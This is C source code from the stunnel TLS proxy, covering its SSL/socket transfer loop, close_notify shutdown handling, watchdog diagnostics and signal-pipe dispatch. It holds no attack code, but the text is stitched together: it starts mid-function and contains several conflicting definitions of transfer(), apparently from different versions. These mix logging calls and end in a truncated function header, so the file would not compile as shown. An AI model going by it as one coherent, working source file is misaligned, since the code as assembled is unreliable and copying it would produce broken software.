s_log(LOG_DEBUG, "SSL_write returned WANT_READ: retrying");
write_wants_read=1;
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_write returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL: /* socket error */
if(!num) { /* EOF */
if(c->sock_ptr) {
s_log(LOG_ERR,
"SSL socket closed on SSL_write "
"with %d byte(s) in buffer",
c->sock_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_DEBUG, "SSL socket closed on SSL_write");
ssl_open_rd=ssl_open_wr=0; /* buggy peer: no close_notify */
} else
parse_socket_error(c, "SSL_write");
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
s_log(LOG_DEBUG, "SSL closed on SSL_write");
ssl_open_rd=0;
if(!strcmp(SSL_get_version(c->ssl), "SSLv2"))
ssl_open_wr=0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_write");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_write/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** check write shutdown conditions */
if(sock_open_wr && !ssl_open_rd && !c->ssl_ptr) {
s_log(LOG_DEBUG, "Sending socket write shutdown");
sock_open_wr=0; /* no further write allowed */
shutdown(c->sock_wfd->fd, SHUT_WR); /* send TCP FIN */
}
if(ssl_open_wr && !sock_open_rd && !c->sock_ptr) {
s_log(LOG_DEBUG, "Sending SSL write shutdown");
ssl_open_wr=0; /* no further write allowed */
if(strcmp(SSL_get_version(c->ssl), "SSLv2")) { /* SSLv3, TLSv1 */
shutdown_wants_write=1; /* initiate close_notify */
} else { /* no alerts in SSLv2 including close_notify alert */
shutdown(c->sock_rfd->fd, SHUT_RD); /* notify the kernel */
shutdown(c->sock_wfd->fd, SHUT_WR); /* send TCP FIN */
SSL_set_shutdown(c->ssl, /* notify the OpenSSL library */
SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
ssl_open_rd=0; /* no further read allowed */
}
}
/****************************** check watchdog */
if(++watchdog>100) { /* loop executes without transferring any data */
s_log(LOG_ERR,
"transfer() loop executes not transferring any data");
s_log(LOG_ERR,
"please report the problem to [email protected]");
stunnel_info(LOG_ERR);
s_log(LOG_ERR, "protocol=%s, SSL_pending=%d",
SSL_get_version(c->ssl), SSL_pending(c->ssl));
s_log(LOG_ERR, "sock_open_rd=%s, sock_open_wr=%s, "
"ssl_open_rd=%s, ssl_open_wr=%s",
sock_open_rd ? "Y" : "n", sock_open_wr ? "Y" : "n",
ssl_open_rd ? "Y" : "n", ssl_open_wr ? "Y" : "n");
s_log(LOG_ERR, "sock_can_rd=%s, sock_can_wr=%s, "
"ssl_can_rd=%s, ssl_can_wr=%s",
sock_can_rd ? "Y" : "n", sock_can_wr ? "Y" : "n",
ssl_can_rd ? "Y" : "n", ssl_can_wr ? "Y" : "n");
s_log(LOG_ERR, "read_wants_read=%s, read_wants_write=%s",
read_wants_read ? "Y" : "n",
read_wants_write ? "Y" : "n");
s_log(LOG_ERR, "write_wants_read=%s, write_wants_write=%s",
write_wants_read ? "Y" : "n",
write_wants_write ? "Y" : "n");
s_log(LOG_ERR, "shutdown_wants_read=%s, shutdown_wants_write=%s",
shutdown_wants_read ? "Y" : "n",
shutdown_wants_write ? "Y" : "n");
s_log(LOG_ERR, "socket input buffer: %d byte(s), "
"ssl input buffer: %d byte(s)", c->sock_ptr, c->ssl_ptr);
longjmp(c->err, 1);
}
} while(sock_open_wr || ssl_open_wr ||
shutdown_wants_read || shutdown_wants_write);
}
NOEXPORT int signal_pipe_dispatch(void) {
static int sig;
static size_t ptr=0;
ssize_t num;
char *sig_name;
s_log(LOG_DEBUG, "Dispatching signals from the signal pipe");
for(;;) {
num=readsocket(signal_pipe[0], (char *)&sig+ptr, sizeof sig-ptr);
if(num==-1 && get_last_socket_error()==S_EWOULDBLOCK) {
s_log(LOG_DEBUG, "Signal pipe is empty");
return 0;
}
if(num==-1 || num==0) {
if(num)
sockerror("signal pipe read");
else
s_log(LOG_ERR, "Signal pipe closed");
s_poll_remove(fds, signal_pipe[0]);
closesocket(signal_pipe[0]);
closesocket(signal_pipe[1]);
if(signal_pipe_init()) {
s_log(LOG_ERR,
"Signal pipe reinitialization failed; terminating");
return 1;
}
s_poll_add(fds, signal_pipe[0], 1, 0);
s_log(LOG_ERR, "Signal pipe reinitialized");
return 0;
}
ptr+=(size_t)num;
if(ptr<sizeof sig) {
s_log(LOG_DEBUG, "Incomplete signal pipe read (ptr=%ld)",
(long)ptr);
return 0;
}
ptr=0;
switch(sig) {
#ifndef USE_WIN32
case SIGCHLD:
s_log(LOG_DEBUG, "Processing SIGCHLD");
#ifdef USE_FORK
client_status(); /* report status of client process */
#else /* USE_UCONTEXT || USE_PTHREAD */
child_status(); /* report status of libwrap or 'exec' process */
#endif /* defined USE_FORK */
break;
#endif /* !defind USE_WIN32 */
case SIGNAL_RELOAD_CONFIG:
s_log(LOG_DEBUG, "Processing SIGNAL_RELOAD_CONFIG");
if(options_parse(CONF_RELOAD)) {
s_log(LOG_ERR, "Failed to reload the configuration file");
} else {
unbind_ports();
log_close();
options_apply();
log_open();
ui_config_reloaded();
if(bind_ports()) {
/* FIXME: handle the error */
}
}
break;
case SIGNAL_REOPEN_LOG:
s_log(LOG_DEBUG, "Processing SIGNAL_REOPEN_LOG");
log_close();
log_open();
s_log(LOG_NOTICE, "Log file reopened");
break;
case SIGNAL_TERMINATE:
s_log(LOG_DEBUG, "Processing SIGNAL_TERMINATE");
s_log(LOG_NOTICE, "Terminated");
return 1;
default:
sig_name=signal_name(sig);
s_log(LOG_ERR, "Received %s; terminating", sig_name);
str_free(sig_name);
return 1;
}
}
}
static int transfer(CLI *c) { /* transfer data */
fd_set rd_set, wr_set;
int num, err, fdno;
int check_SSL_pending;
int ssl_closing;
/* 0=not closing SSL, 1=initiate SSL_shutdown,
* 2=retry SSL_shutdown, 3=SSL_shutdown done */
int ready;
struct timeval tv;
/* fdno=max(c->sock_rfd->fd, c->sock_wfd->fd,
* fdno=c->ssl_rfd->fd, fdno=c->ssl_wfd->fd)+1 */
fdno=c->sock_rfd->fd;
if(c->sock_wfd->fd>fdno) fdno=c->sock_wfd->fd;
if(c->ssl_rfd->fd>fdno) fdno=c->ssl_rfd->fd;
if(c->ssl_wfd->fd>fdno) fdno=c->ssl_wfd->fd;
fdno+=1;
c->sock_ptr=c->ssl_ptr=0;
sock_rd=sock_wr=ssl_rd=ssl_wr=1;
c->sock_bytes=c->ssl_bytes=0;
ssl_closing=0;
while(((sock_rd||c->sock_ptr)&&ssl_wr)||((ssl_rd||c->ssl_ptr)&&sock_wr)) {
FD_ZERO(&rd_set); /* Setup rd_set */
if(sock_rd && c->sock_ptr<BUFFSIZE) /* socket input buffer not full*/
FD_SET(c->sock_rfd->fd, &rd_set);
if(ssl_rd && (
c->ssl_ptr<BUFFSIZE || /* SSL input buffer not full */
((c->sock_ptr||ssl_closing) && SSL_want_read(c->ssl))
/* I want to SSL_write or SSL_shutdown but read from the
* underlying socket needed for the SSL protocol */
)) {
FD_SET(c->ssl_rfd->fd, &rd_set);
}
FD_ZERO(&wr_set); /* Setup wr_set */
if(sock_wr && c->ssl_ptr) /* SSL input buffer not empty */
FD_SET(c->sock_wfd->fd, &wr_set);
if (ssl_wr && (
c->sock_ptr || /* socket input buffer not empty */
ssl_closing==1 || /* initiate SSL_shutdown */
((c->ssl_ptr<BUFFSIZE || ssl_closing==2) &&
SSL_want_write(c->ssl))
/* I want to SSL_read or SSL_shutdown but write to the
* underlying socket needed for the SSL protocol */
)) {
FD_SET(c->ssl_wfd->fd, &wr_set);
}
tv.tv_sec=sock_rd ||
(ssl_wr&&c->sock_ptr) || (sock_wr&&c->ssl_ptr) ?
c->opt->timeout_idle : c->opt->timeout_close;
tv.tv_usec=0;
ready=sselect(fdno, &rd_set, &wr_set, NULL, &tv);
if(ready<0) { /* Break the connection for others */
sockerror("select");
return -1;
}
if(!ready) { /* Timeout */
if(sock_rd) { /* No traffic for a long time */
log(LOG_DEBUG, "select timeout: connection reset");
return -1;
} else { /* Timeout waiting for SSL close_notify */
log(LOG_DEBUG, "select timeout waiting for SSL close_notify");
break; /* Leave the while() loop */
}
}
if(ssl_closing==1 /* initiate SSL_shutdown */ || (ssl_closing==2 && (
(SSL_want_read(c->ssl) && FD_ISSET(c->ssl_rfd->fd, &rd_set)) ||
(SSL_want_write(c->ssl) && FD_ISSET(c->ssl_wfd->fd, &wr_set))
))) {
switch(SSL_shutdown(c->ssl)) { /* Send close_notify */
case 1: /* the shutdown was successfully completed */
log(LOG_INFO, "SSL_shutdown successfully sent close_notify");
ssl_wr=0; /* SSL write closed */
/* TODO: It's not really closed. We need to distinguish
* closed SSL and closed underlying file descriptor */
ssl_closing=3; /* done! */
break;
case 0: /* the shutdown is not yet finished */
log(LOG_DEBUG, "SSL_shutdown retrying");
ssl_closing=2; /* next time just retry SSL_shutdown */
break;
case -1: /* a fatal error occurred */
sslerror("SSL_shutdown");
return -1;
}
}
/* Set flag to try and read any buffered SSL data if we made */
/* room in the buffer by writing to the socket */
check_SSL_pending = 0;
if(sock_wr && FD_ISSET(c->sock_wfd->fd, &wr_set)) {
switch(num=writesocket(c->sock_wfd->fd, c->ssl_buff, c->ssl_ptr)) {
case -1: /* error */
switch(get_last_socket_error()) {
case EINTR:
log(LOG_DEBUG,
"writesocket interrupted by a signal: retrying");
break;
case EWOULDBLOCK:
log(LOG_NOTICE, "writesocket would block: retrying");
break;
default:
sockerror("writesocket");
return -1;
}
break;
case 0:
log(LOG_DEBUG, "No data written to the socket: retrying");
break;
default:
memmove(c->ssl_buff, c->ssl_buff+num, c->ssl_ptr-num);
if(c->ssl_ptr==BUFFSIZE)
check_SSL_pending=1;
c->ssl_ptr-=num;
c->sock_bytes+=num;
if(!ssl_rd && !c->ssl_ptr) {
shutdown(c->sock_wfd->fd, SHUT_WR);
log(LOG_DEBUG,
"Socket write shutdown (no more data to send)");
sock_wr=0;
}
}
}
if(ssl_wr && ( /* SSL sockets are still open */
(c->sock_ptr && FD_ISSET(c->ssl_wfd->fd, &wr_set)) ||
/* See if application data can be written */
(SSL_want_read(c->ssl) && FD_ISSET(c->ssl_rfd->fd, &rd_set))
/* I want to SSL_write but read from the underlying */
/* socket needed for the SSL protocol */
)) {
num=SSL_write(c->ssl, c->sock_buff, c->sock_ptr);
err=SSL_get_error(c->ssl, num);
switch(err) {
case SSL_ERROR_NONE:
memmove(c->sock_buff, c->sock_buff+num, c->sock_ptr-num);
c->sock_ptr-=num;
c->ssl_bytes+=num;
if(!ssl_closing && !sock_rd && !c->sock_ptr && ssl_wr) {
log(LOG_DEBUG,
"SSL write shutdown (no more data to send)");
ssl_closing=1;
}
break;
case SSL_ERROR_WANT_WRITE:
case SSL_ERROR_WANT_READ:
case SSL_ERROR_WANT_X509_LOOKUP:
log(LOG_DEBUG, "SSL_write returned WANT_: retrying");
break;
case SSL_ERROR_SYSCALL:
if(num<0) { /* really an error */
switch(get_last_socket_error()) {
case EINTR:
log(LOG_DEBUG,
"SSL_write interrupted by a signal: retrying");
break;
case EAGAIN:
log(LOG_DEBUG,
"SSL_write returned EAGAIN: retrying");
break;
default:
sockerror("SSL_write (ERROR_SYSCALL)");
return -1;
}
}
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
log(LOG_DEBUG, "SSL closed on SSL_write");
ssl_rd=ssl_wr=0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_write");
return -1;
default:
log(LOG_ERR, "SSL_write/SSL_get_error returned %d", err);
return -1;
}
}
if(sock_rd && FD_ISSET(c->sock_rfd->fd, &rd_set)) {
switch(num=readsocket(c->sock_rfd->fd,
c->sock_buff+c->sock_ptr, BUFFSIZE-c->sock_ptr)) {
case -1:
switch(get_last_socket_error()) {
case EINTR:
log(LOG_DEBUG,
"readsocket interrupted by a signal: retrying");
break;
case EWOULDBLOCK:
log(LOG_NOTICE, "readsocket would block: retrying");
break;
default:
sockerror("readsocket");
return -1;
}
break;
case 0: /* close */
log(LOG_DEBUG, "Socket closed on read");
sock_rd=0;
if(!ssl_closing && !c->sock_ptr && ssl_wr) {
log(LOG_DEBUG,
"SSL write shutdown (output buffer empty)");
ssl_closing=1;
}
break;
default:
c->sock_ptr+=num;
}
}
if(ssl_rd && ( /* SSL sockets are still open */
(c->ssl_ptr<BUFFSIZE && FD_ISSET(c->ssl_rfd->fd, &rd_set)) ||
/* See if there's any application data coming in */
(SSL_want_write(c->ssl) && FD_ISSET(c->ssl_wfd->fd, &wr_set)) ||
/* I want to SSL_read but write to the underlying */
/* socket needed for the SSL protocol */
(check_SSL_pending && SSL_pending(c->ssl))
/* Write made space from full buffer */
)) {
num=SSL_read(c->ssl, c->ssl_buff+c->ssl_ptr, BUFFSIZE-c->ssl_ptr);
err=SSL_get_error(c->ssl, num);
switch(err) {
case SSL_ERROR_NONE:
c->ssl_ptr+=num;
break;
case SSL_ERROR_WANT_WRITE:
case SSL_ERROR_WANT_READ:
case SSL_ERROR_WANT_X509_LOOKUP:
log(LOG_DEBUG, "SSL_read returned WANT_: retrying");
break;
case SSL_ERROR_SYSCALL:
if(num<0) { /* not EOF */
switch(get_last_socket_error()) {
case EINTR:
log(LOG_DEBUG,
"SSL_read interrupted by a signal: retrying");
break;
case EAGAIN:
log(LOG_DEBUG,
"SSL_read returned EAGAIN: retrying");
break;
default:
sockerror("SSL_read (ERROR_SYSCALL)");
return -1;
}
} else { /* EOF */
log(LOG_DEBUG, "SSL socket closed on SSL_read");
ssl_rd=ssl_wr=0;
}
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify received */
log(LOG_DEBUG, "SSL closed on SSL_read");
ssl_rd=0;
if(!ssl_closing && !c->sock_ptr && ssl_wr) {
log(LOG_DEBUG,
"SSL write shutdown (output buffer empty)");
ssl_closing=1;
}
if(!c->ssl_ptr && sock_wr) {
shutdown(c->sock_wfd->fd, SHUT_WR);
log(LOG_DEBUG,
"Socket write shutdown (output buffer empty)");
sock_wr=0;
}
break;
case SSL_ERROR_SSL:
sslerror("SSL_read");
return -1;
default:
log(LOG_ERR, "SSL_read/SSL_get_error returned %d", err);
return -1;
}
}
}
return 0; /* OK */
}
/****************************** transfer data */
NOEXPORT void transfer(CLI *c) {
int watchdog=0; /* a counter to detect an infinite loop */
int num, err;
/* logical channels (not file descriptors!) open for read or write */
int sock_open_rd=1, sock_open_wr=1;
/* awaited conditions on SSL file descriptors */
int shutdown_wants_read=0, shutdown_wants_write=0;
int read_wants_read=0, read_wants_write=0;
int write_wants_read=0, write_wants_write=0;
/* actual conditions on file descriptors */
int sock_can_rd, sock_can_wr, ssl_can_rd, ssl_can_wr;
c->sock_ptr=c->ssl_ptr=0;
do { /* main loop of client data transfer */
/****************************** initialize *_wants_* */
read_wants_read|=!(SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN)
&& c->ssl_ptr<BUFFSIZE && !read_wants_write;
write_wants_write|=!(SSL_get_shutdown(c->ssl)&SSL_SENT_SHUTDOWN)
&& c->sock_ptr && !write_wants_read;
/****************************** setup c->fds structure */
s_poll_init(c->fds); /* initialize the structure */
/* for plain socket open data strem = open file descriptor */
/* make sure to add each open socket to receive exceptions! */
if(sock_open_rd) /* only poll if the read file descriptor is open */
s_poll_add(c->fds, c->sock_rfd->fd, c->sock_ptr<BUFFSIZE, 0);
if(sock_open_wr) /* only poll if the write file descriptor is open */
s_poll_add(c->fds, c->sock_wfd->fd, 0, c->ssl_ptr);
/* poll SSL file descriptors unless SSL shutdown was completed */
if(SSL_get_shutdown(c->ssl)!=
(SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN)) {
s_poll_add(c->fds, c->ssl_rfd->fd,
read_wants_read || write_wants_read || shutdown_wants_read, 0);
s_poll_add(c->fds, c->ssl_wfd->fd, 0,
read_wants_write || write_wants_write || shutdown_wants_write);
}
/****************************** wait for an event */
err=s_poll_wait(c->fds,
(sock_open_rd && /* both peers open */
!(SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN)) ||
c->ssl_ptr /* data buffered to write to socket */ ||
c->sock_ptr /* data buffered to write to SSL */ ?
c->opt->timeout_idle : c->opt->timeout_close, 0);
switch(err) {
case -1:
sockerror("transfer: s_poll_wait");
longjmp(c->err, 1);
case 0: /* timeout */
if((sock_open_rd &&
!(SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN)) ||
c->ssl_ptr || c->sock_ptr) {
s_log(LOG_INFO, "transfer: s_poll_wait:"
" TIMEOUTidle exceeded: sending reset");
longjmp(c->err, 1);
} else { /* already closing connection */
s_log(LOG_ERR, "transfer: s_poll_wait:"
" TIMEOUTclose exceeded: closing");
return; /* OK */
}
}
/****************************** check for errors on sockets */
err=s_poll_error(c->fds, c->sock_rfd->fd);
if(err && err!=S_EWOULDBLOCK && err!=S_EAGAIN) {
s_log(LOG_NOTICE, "Read socket error: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if(c->sock_wfd->fd!=c->sock_rfd->fd) { /* performance optimization */
err=s_poll_error(c->fds, c->sock_wfd->fd);
if(err && err!=S_EWOULDBLOCK && err!=S_EAGAIN) {
s_log(LOG_NOTICE, "Write socket error: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
err=s_poll_error(c->fds, c->ssl_rfd->fd);
if(err && err!=S_EWOULDBLOCK && err!=S_EAGAIN) {
s_log(LOG_NOTICE, "SSL socket error: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if(c->ssl_wfd->fd!=c->ssl_rfd->fd) { /* performance optimization */
err=s_poll_error(c->fds, c->ssl_wfd->fd);
if(err && err!=S_EWOULDBLOCK && err!=S_EAGAIN) {
s_log(LOG_NOTICE, "SSL socket error: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
/****************************** check for hangup conditions */
if(s_poll_hup(c->fds, c->sock_rfd->fd)) {
s_log(LOG_INFO, "Read socket closed (hangup)");
sock_open_rd=0;
}
if(s_poll_hup(c->fds, c->sock_wfd->fd)) {
if(c->ssl_ptr) {
s_log(LOG_ERR,
"Write socket closed (hangup) with %d unsent byte(s)",
c->ssl_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_INFO, "Write socket closed (hangup)");
sock_open_wr=0;
}
if(s_poll_hup(c->fds, c->ssl_rfd->fd) ||
s_poll_hup(c->fds, c->ssl_wfd->fd)) {
/* hangup -> buggy (e.g. Microsoft) peer:
* SSL socket closed without close_notify alert */
if(c->sock_ptr || write_wants_write) {
s_log(LOG_ERR,
"SSL socket closed (hangup) with %d unsent byte(s)",
c->sock_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_INFO, "SSL socket closed (hangup)");
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
}
/****************************** retrieve results from c->fds */
sock_can_rd=s_poll_canread(c->fds, c->sock_rfd->fd);
sock_can_wr=s_poll_canwrite(c->fds, c->sock_wfd->fd);
ssl_can_rd=s_poll_canread(c->fds, c->ssl_rfd->fd);
ssl_can_wr=s_poll_canwrite(c->fds, c->ssl_wfd->fd);
/****************************** checks for internal failures */
/* please report any internal errors to stunnel-users mailing list */
if(!(sock_can_rd || sock_can_wr || ssl_can_rd || ssl_can_wr)) {
s_log(LOG_ERR, "INTERNAL ERROR: "
"s_poll_wait returned %d, but no descriptor is ready", err);
longjmp(c->err, 1);
}
if(c->reneg_state==RENEG_DETECTED && !c->opt->option.renegotiation) {
s_log(LOG_ERR, "Aborting due to renegotiation request");
longjmp(c->err, 1);
}
/****************************** send SSL close_notify alert */
if(shutdown_wants_read || shutdown_wants_write) {
num=SSL_shutdown(c->ssl); /* send close_notify alert */
if(num<0) /* -1 - not completed */
err=SSL_get_error(c->ssl, num);
else /* 0 or 1 - success */
err=SSL_ERROR_NONE;
switch(err) {
case SSL_ERROR_NONE: /* the shutdown was successfully completed */
s_log(LOG_INFO, "SSL_shutdown successfully sent close_notify alert");
shutdown_wants_read=shutdown_wants_write=0;
break;
case SSL_ERROR_SYSCALL: /* socket error */
if(parse_socket_error(c, "SSL_shutdown"))
break; /* a non-critical error: retry */
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
shutdown_wants_read=shutdown_wants_write=0;
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_shutdown returned WANT_WRITE: retrying");
shutdown_wants_read=0;
shutdown_wants_write=1;
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG, "SSL_shutdown returned WANT_READ: retrying");
shutdown_wants_read=1;
shutdown_wants_write=0;
break;
case SSL_ERROR_SSL: /* SSL error */
sslerror("SSL_shutdown");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_shutdown/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** read from socket */
if(sock_open_rd && sock_can_rd) {
num=readsocket(c->sock_rfd->fd,
c->sock_buff+c->sock_ptr, BUFFSIZE-c->sock_ptr);
switch(num) {
case -1:
if(parse_socket_error(c, "readsocket"))
break; /* a non-critical error: retry */
sock_open_rd=sock_open_wr=0;
break;
case 0: /* close */
s_log(LOG_INFO, "Read socket closed (readsocket)");
sock_open_rd=0;
break;
default:
c->sock_ptr+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** write to socket */
if(sock_open_wr && sock_can_wr) {
num=writesocket(c->sock_wfd->fd, c->ssl_buff, c->ssl_ptr);
switch(num) {
case -1: /* error */
if(parse_socket_error(c, "writesocket"))
break; /* a non-critical error: retry */
sock_open_rd=sock_open_wr=0;
break;
default:
memmove(c->ssl_buff, c->ssl_buff+num, c->ssl_ptr-num);
c->ssl_ptr-=num;
c->sock_bytes+=num;
watchdog=0; /* reset watchdog */
}
}
/****************************** update *_wants_* based on new *_ptr */
/* this update is also required for SSL_pending() to be used */
read_wants_read|=!(SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN)
&& c->ssl_ptr<BUFFSIZE && !read_wants_write;
write_wants_write|=!(SSL_get_shutdown(c->ssl)&SSL_SENT_SHUTDOWN)
&& c->sock_ptr && !write_wants_read;
/****************************** read from SSL */
if((read_wants_read && (ssl_can_rd || SSL_pending(c->ssl))) ||
/* it may be possible to read some pending data after
* writesocket() above made some room in c->ssl_buff */
(read_wants_write && ssl_can_wr)) {
read_wants_read=0;
read_wants_write=0;
num=SSL_read(c->ssl, c->ssl_buff+c->ssl_ptr, BUFFSIZE-c->ssl_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
if(num==0)
s_log(LOG_DEBUG, "SSL_read returned 0");
c->ssl_ptr+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG, "SSL_read returned WANT_WRITE: retrying");
read_wants_write=1;
break;
case SSL_ERROR_WANT_READ: /* is it possible? */
s_log(LOG_DEBUG, "SSL_read returned WANT_READ: retrying");
read_wants_read=1;
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_read returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL:
if(num && parse_socket_error(c, "SSL_read"))
break; /* a non-critical error: retry */
/* EOF -> buggy (e.g. Microsoft) peer:
* SSL socket closed without close_notify alert */
if(c->sock_ptr || write_wants_write) {
s_log(LOG_ERR,
"SSL socket closed (SSL_read) with %d unsent byte(s)",
c->sock_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_INFO, "SSL socket closed (SSL_read)");
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify alert received */
s_log(LOG_INFO, "SSL closed (SSL_read)");
if(SSL_version(c->ssl)==SSL2_VERSION)
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_SSL:
sslerror("SSL_read");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_read/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** write to SSL */
if((write_wants_read && ssl_can_rd) ||
(write_wants_write && ssl_can_wr)) {
write_wants_read=0;
write_wants_write=0;
num=SSL_write(c->ssl, c->sock_buff, c->sock_ptr);
switch(err=SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
if(num==0)
s_log(LOG_DEBUG, "SSL_write returned 0");
memmove(c->sock_buff, c->sock_buff+num, c->sock_ptr-num);
c->sock_ptr-=num;
c->ssl_bytes+=num;
watchdog=0; /* reset watchdog */
break;
case SSL_ERROR_WANT_WRITE: /* buffered data? */
s_log(LOG_DEBUG, "SSL_write returned WANT_WRITE: retrying");
write_wants_write=1;
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG, "SSL_write returned WANT_READ: retrying");
write_wants_read=1;
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_write returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL: /* socket error */
if(num && parse_socket_error(c, "SSL_write"))
break; /* a non-critical error: retry */
/* EOF -> buggy (e.g. Microsoft) peer:
* SSL socket closed without close_notify alert */
if(c->sock_ptr) { /* TODO: what about buffered data? */
s_log(LOG_ERR,
"SSL socket closed (SSL_write) with %d unsent byte(s)",
c->sock_ptr);
longjmp(c->err, 1); /* reset the socket */
}
s_log(LOG_INFO, "SSL socket closed (SSL_write)");
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_ZERO_RETURN: /* close_notify alert received */
s_log(LOG_INFO, "SSL closed (SSL_write)");
if(SSL_version(c->ssl)==SSL2_VERSION)
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_SSL:
sslerror("SSL_write");
longjmp(c->err, 1);
default:
s_log(LOG_ERR, "SSL_write/SSL_get_error returned %d", err);
longjmp(c->err, 1);
}
}
/****************************** check write shutdown conditions */
if(sock_open_wr && SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN &&
!c->ssl_ptr) {
sock_open_wr=0; /* no further write allowed */
if(!c->sock_wfd->is_socket) {
s_log(LOG_DEBUG, "Closing the file descriptor");
sock_open_rd=0; /* file descriptor is ready to be closed */
} else if(!shutdown(c->sock_wfd->fd, SHUT_WR)) { /* send TCP FIN */
s_log(LOG_DEBUG, "Sent socket write shutdown");
} else {
s_log(LOG_DEBUG, "Failed to send socket write shutdown");
sock_open_rd=0; /* file descriptor is ready to be closed */
}
}
if(!(SSL_get_shutdown(c->ssl)&SSL_SENT_SHUTDOWN) && !sock_open_rd &&
!c->sock_ptr && !write_wants_write) {
if(SSL_version(c->ssl)!=SSL2_VERSION) {
s_log(LOG_DEBUG, "Sending close_notify alert");
shutdown_wants_write=1;
} else { /* no alerts in SSLv2, including the close_notify alert */
s_log(LOG_DEBUG, "Closing SSLv2 socket");
if(c->ssl_rfd->is_socket)
shutdown(c->ssl_rfd->fd, SHUT_RD); /* notify the kernel */
if(c->ssl_wfd->is_socket)
shutdown(c->ssl_wfd->fd, SHUT_WR); /* send TCP FIN */
/* notify the OpenSSL library */
SSL_set_shutdown(c->ssl, SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
}
}
/****************************** check watchdog */
if(++watchdog>100) { /* loop executes without transferring any data */
s_log(LOG_ERR,
"transfer() loop executes not transferring any data");
s_log(LOG_ERR,
"please report the problem to [email protected]");
stunnel_info(LOG_ERR);
s_log(LOG_ERR, "protocol=%s, SSL_pending=%d",
SSL_get_version(c->ssl), SSL_pending(c->ssl));
s_log(LOG_ERR, "sock_open_rd=%s, sock_open_wr=%s",
sock_open_rd ? "Y" : "n", sock_open_wr ? "Y" : "n");
s_log(LOG_ERR, "SSL_RECEIVED_SHUTDOWN=%s, SSL_SENT_SHUTDOWN=%s",
SSL_get_shutdown(c->ssl)&SSL_RECEIVED_SHUTDOWN ? "Y" : "n",
SSL_get_shutdown(c->ssl)&SSL_SENT_SHUTDOWN ? "Y" : "n");
s_log(LOG_ERR, "sock_can_rd=%s, sock_can_wr=%s",
sock_can_rd ? "Y" : "n", sock_can_wr ? "Y" : "n");
s_log(LOG_ERR, "ssl_can_rd=%s, ssl_can_wr=%s",
ssl_can_rd ? "Y" : "n", ssl_can_wr ? "Y" : "n");
s_log(LOG_ERR, "read_wants_read=%s, read_wants_write=%s",
read_wants_read ? "Y" : "n", read_wants_write ? "Y" : "n");
s_log(LOG_ERR, "write_wants_read=%s, write_wants_write=%s",
write_wants_read ? "Y" : "n", write_wants_write ? "Y" : "n");
s_log(LOG_ERR, "shutdown_wants_read=%s, shutdown_wants_write=%s",
shutdown_wants_read ? "Y" : "n",
shutdown_wants_write ? "Y" : "n");
s_log(LOG_ERR, "socket input buffer: %d byte(s), "
"ssl input buffer: %d byte(s)", c->sock_ptr, c->ssl_ptr);
longjmp(c->err, 1);
}
} while(sock_open_wr || !(SSL_get_shutdown(c->ssl)&SSL_SENT_SHUTDOWN) ||
shutdown_wants_read || shutdown_wants_write);
}
static void transfer(CLI * c)
{
int watchdog = 0;
int num, err;
int sock_open_rd = 1, sock_open_wr = 1;
int shutdown_wants_read = 0, shutdown_wants_write = 0;
int read_wants_read, read_wants_write = 0;
int write_wants_read = 0, write_wants_write;
int sock_can_rd, sock_can_wr, ssl_can_rd, ssl_can_wr;
